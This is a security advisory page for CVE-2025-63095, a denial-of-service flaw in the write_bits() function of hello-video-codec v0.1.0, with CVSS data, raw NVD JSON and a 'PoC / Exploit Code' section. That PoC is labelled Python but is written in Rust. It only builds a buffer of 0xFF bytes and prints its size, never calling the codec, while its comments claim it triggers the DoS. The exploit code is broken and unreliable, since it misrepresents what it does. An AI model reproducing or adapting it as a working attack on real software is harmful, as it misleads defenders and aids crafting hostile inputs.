Security Vulnerability Report
中文
CVE-2025-63095 CVSS 6.5 MEDIUM

CVE-2025-63095

Published: 2025-12-01 16:15:56
Last Modified: 2025-12-23 13:53:08

Description

Improper input validation in the BitstreamWriter::write_bits() function of Tempus Ex hello-video-codec v0.1.0 allows attackers to cause a Denial of Service (DoS) via a crafted input.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:tempus-ex:hello-video-codec:0.1.0:*:*:*:*:*:*:* - VULNERABLE
Tempus Ex hello-video-codec v0.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
// PoC for CVE-2025-63095 // Description: Crafted input triggering BitstreamWriter::write_bits() improper input validation // This PoC generates a malicious bitstream that causes DoS in hello-video-codec fn generate_malicious_bitstream() -> Vec<u8> { let mut payload = Vec::new(); // Craft header with invalid bit length parameters payload.push(0x00); payload.push(0x00); payload.push(0x00); payload.push(0x01); // Malformed bitstream data that triggers write_bits() validation issue // Attempting to write bits beyond expected range for _ in 0..1000 { payload.push(0xFF); payload.push(0xFF); payload.push(0xFF); } payload } fn main() { let malicious_data = generate_malicious_bitstream(); // Simulate processing with BitstreamWriter // In vulnerable version, this will trigger DoS println!("Malicious bitstream size: {} bytes", malicious_data.len()); println!("CVE-2025-63095 PoC - DoS trigger via improper write_bits() validation"); }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63095", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:55.657", "lastModified": "2025-12-23T13:53:07.503", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper input validation in the BitstreamWriter::write_bits() function of Tempus Ex hello-video-codec v0.1.0 allows attackers to cause a Denial of Service (DoS) via a crafted input."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tempus-ex:hello-video-codec:0.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5CF54CCF-E9A4-4D31-8FCA-758A7B87DBCD"}]}]}], "references": [{"url": "https://gist.github.com/thesmartshadow/b092e2493821491b981a069847a33064", "source": "[email protected]", "tags": ["Exploit", "Patch", "Third Party Advisory"]}, {"url": "https://github.com/tempus-ex/hello-video-codec", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/tempus-ex/hello-video-codec/blob/3e9551c699311ea12ad7f2fce9562fbc990d524c/src/bitstream.rs", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/tempus-ex/hello-video-codec/tree/3e9551c699311ea12ad7f2fce9562fbc990d524c", "source": "[email protected]", "tags": ["Product"]}]}}